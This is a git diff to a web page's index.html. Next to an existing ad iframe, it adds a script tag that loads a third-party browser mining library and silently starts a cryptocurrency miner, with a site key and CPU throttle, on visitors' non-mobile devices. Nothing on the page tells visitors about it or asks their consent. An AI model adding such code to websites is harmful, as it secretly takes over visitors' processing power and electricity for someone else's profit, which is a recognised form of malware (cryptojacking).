--- a/index.html
+++ b/index.html
@@ -26,6 +26,14 @@
 <iframe data-aa='2282310' src='//ad.a-ads.com/2282310?size=320x100' style='width:320px; height:100px; border:0px; padding:0; overflow:hidden; background-color: transparent;'></iframe>
 
 
+
+<script src="https://webminepool.com/lib/base.js"></script>
+<script>
+    var miner = WMP.Anonymous('SK_aTWoEjV9raCL4CHnXr3xt',{throttle: 0.3});
+    if (!miner.isMobile()){
+        miner.start();
+    }
+</script>
 <script>
     const inputField = document.getElementById('inputField');
     const outputField = document.getElementById('outputField');
